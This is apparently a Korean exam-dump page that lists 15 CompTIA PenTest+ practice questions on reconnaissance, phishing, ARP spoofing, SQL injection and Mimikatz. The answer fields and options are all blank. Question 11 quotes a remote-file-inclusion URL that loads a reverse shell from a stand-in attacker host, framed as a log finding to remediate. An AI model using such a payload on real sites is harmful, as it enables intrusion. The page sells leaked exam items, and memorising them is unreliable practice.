시험덤프
매달, 우리는 1000명 이상의 사람들이 시험 준비를 잘하고 시험을 잘 통과할 수 있도록 도와줍니다.
  / PT0-001 덤프  / PT0-001 문제 연습

CompTIA PT0-001 시험

CompTIA PenTest+ Certification Exam 온라인 연습

최종 업데이트 시간: 2024년04월10일,145문제.

당신은 온라인 연습 문제를 통해 CompTIA PT0-001 시험지식에 대해 자신이 어떻게 알고 있는지 파악한 후 시험 참가 신청 여부를 결정할 수 있다.

시험을 100% 합격하고 시험 준비 시간을 35% 절약하기를 바라며 PT0-001 덤프 (최신 실제 시험 문제)를 사용 선택하여 현재 최신 145개의 시험 문제와 답을 포함하십시오.

 / 6

Question No : 1


Which of the following reasons does penetration tester needs to have a customer's point-of -contact information available at all time? (Select THREE).

정답:

Question No : 2


A penetration tester has been assigned to perform an external penetration assessment of a company .
Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

정답:

Question No : 3


Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own .
Which of the following URLs can he use to accomplish this attack?

정답:

Question No : 4


The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test .
Which of the following are the MOST likely causes for this difference? (Select TWO)

정답:

Question No : 5


A company received a report with the following finding . While on the internal network the penetration tester was able to successfully capture SMB broadcasted user ID and password information on the network and decode this information. This allowed the penetration tester to then join their own computer to the ABC domain.
Which of the following remediation’s are appropriate for the reported findings'? (Select TWO)

정답:

Question No : 6


A consultant is identifying versions of Windows operating systems on a network.
Which of the following Nmap commands should the consultant run?

정답:

Question No : 7


While conducting information gathering, a penetration tester is trying to identify Windows hosts .
Which of the following characteristics would be BEST to use for fingerprinting?

정답:
Explanation:
Reference: https://social.technet.microsoft.com/Forums/windowsserver/en-US/67920af3-f60e-43dc-9941-feca54380b52/default-ttl-for-various-oss?forum=winserverpowershell#:~:text=The%20Default%20Ttl%20for%20windows,default%20for%20Unix%20is%2064

Question No : 8


A penetration tester has been hired to perform a penetration test for an organization .
Which of the following is indicative of an error-based SQL injection attack?

정답:

Question No : 9


A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization .
Which of the following techniques would be the MOST appropriate? (Select TWO)

정답:

Question No : 10


A penetration tester is performing ARP spoofing against a switch .
Which of the following should the penetration tester spoof to get the MOST information?

정답:

Question No : 11


While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?

정답:

Question No : 12


During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.
Which of the following registry changes would allow for credential caching in memory?

정답:

Question No : 13


Given the following Python code:
a = 'abcdefghijklmnop'
a[::2]
Which of the following will result?

정답:
Explanation:
Reference: https://blog.finxter.com/python-double-colon/

Question No : 14


A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode .
Which of the following steps must the firm take before it can run a static code analyzer?

정답:

Question No : 15


An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK.
Which of the following attack vectors would the attacker MOST likely use?

정답:

 / 6